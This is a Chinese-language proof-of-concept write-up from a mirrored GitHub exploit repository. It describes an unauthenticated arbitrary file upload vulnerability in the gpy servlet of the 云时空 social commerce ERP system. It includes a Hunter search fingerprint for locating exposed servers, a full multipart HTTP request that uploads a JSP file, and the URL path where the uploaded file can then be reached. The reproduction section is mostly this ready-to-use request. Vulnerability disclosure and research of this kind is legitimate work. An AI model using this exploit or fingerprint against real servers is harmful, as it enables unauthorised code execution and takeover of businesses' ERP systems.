mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
51 lines
2.0 KiB
Markdown
51 lines
2.0 KiB
Markdown
|
|
# 云时空社会化商业ERP系统gpy任意文件上传漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
云时空社会化商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。云时空社会化商业ERP系统gpy接口存在任意文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端上传jsp文件获取服务器权限。
|
|||
|
|
|
|||
|
|
# <font style="color:rgb(44, 62, 80);">二、影响版本</font>
|
|||
|
|
+ 云时空社会化商业ERP
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ hunter`web.body="/static/plugin/lhgdialog/skins/default.css"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
POST /servlet/fileupload/gpy HTTP/1.1
|
|||
|
|
Host: {hostname}
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Connection: close
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388
|
|||
|
|
Content-Length: 221
|
|||
|
|
|
|||
|
|
--4eea98d02AEa93f60ea08dE3C18A1388
|
|||
|
|
Content-Disposition: form-data; name="file1"; filename="stc.jsp"
|
|||
|
|
Content-Type: application/octet-stream
|
|||
|
|
|
|||
|
|
<% out.println("123"); %>
|
|||
|
|
--4eea98d02AEa93f60ea08dE3C18A1388--
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
上传文件位置
|
|||
|
|
|
|||
|
|
2023-12-13,为响应时间
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
/uploads/pics/2023-12-13/stc.jsp
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:55:43
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gisby3trr2tide3u>
|